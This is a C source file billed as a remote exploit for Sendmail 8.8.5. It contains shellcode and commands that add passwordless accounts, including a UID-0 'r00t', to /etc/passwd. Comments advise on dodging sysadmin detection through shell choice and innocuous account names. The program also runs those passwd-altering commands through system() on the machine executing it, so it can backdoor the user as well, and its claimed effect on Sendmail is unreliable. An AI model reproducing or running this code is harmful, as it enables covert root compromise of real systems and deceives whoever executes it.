.               .  

/* sendmail885.c
 *  Sendmail 8.8.5 remote/local (if you use localhost for the host)
 *  exploit. Could be exploitable on other versions.
 *
 *  carparts original code by su1d
 *
 *  Modified slightly by scud_ <scud@thtj.com>
 *      - Fixed a few things I felt might get you discovered very fast 
 *      - Also made this program a wee bit more user friendly
 *
 *  Try gcc -o sendmail885 sendmail885.c to get this to compile
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define NOP 0x90

/* DO NOT CHANGE - SIZE COMPUTED */
char shellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff";

/* DO NOT CHANGE - SIZE COMPUTED */

/* Carparts original set the shell to /bin/bash, I changed this to 
tcsh, since tsch doesnt have a log, but all of this *really* doesnt matter
much. However, a sysadmin seeing a .bash_history file in / would not be a
good thing. You could also just ln the history file to /dev/null */
 
/* Carparts original set the 2 new accounts to 'n0tr00t' and 'r00t'. This
may be fine, but if a sysadmin did a who list and sees that, what do you
think his next command will be? I left the r00t, but modded n0tr00t to
stephen, since stephen sounds like such an innocent user. */

char commands[] =
"/bin/echo \"stephen::1000:1000:Stephen:/:/bin/tcsh\" >> /etc/passwd\n"
"/bin/echo \"r00t::0:0:r00t:/:/bin/tcsh\" >> /etc/passwd\n";

int main
(
	int  argc,
	char **argv
)
{
	int i;
	int sock;
	char *ptr;
	char *clear;
	char buf[8192];
	struct sockaddr_in sin;
	struct hostent *hp;
	if(argc<2)
	{
		/* Carparts original error message was a bit cryptic */

		printf("Usage: %s site.to.exploit\n", argv[0]);
		exit(-1);
	}
	ptr = buf;
	for(i=0;i<=4096;i++) buf[i] = NOP;
	ptr += i;
	memcpy(ptr,shellcode,sizeof(shellcode));
	ptr += sizeof(shellcode);
	clear = commands;
	memcpy(ptr,clear,sizeof(commands));
	ptr += sizeof(commands);
	memcpy(ptr,"3824",4);
	system(clear);
	printf("Connecting To %s\n",argv[1]);
	hp = gethostbyname(argv[1]);
	if(hp==NULL)
	{
		printf("Unknown Host\n");
		exit(-1);
	}
	bzero((char*) &sin, sizeof(sin));
	bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
	sin.sin_family = hp->h_addrtype;
	sin.sin_port = htons(25);
	sock = socket(AF_INET, SOCK_STREAM, 0);
	connect(sock,(struct sockaddr *) &sin, sizeof(sin));
	send(sock,buf,sizeof(buf),0);
	close(sock);
	printf("Exploit Successfully Executed\n");
	return(0);
}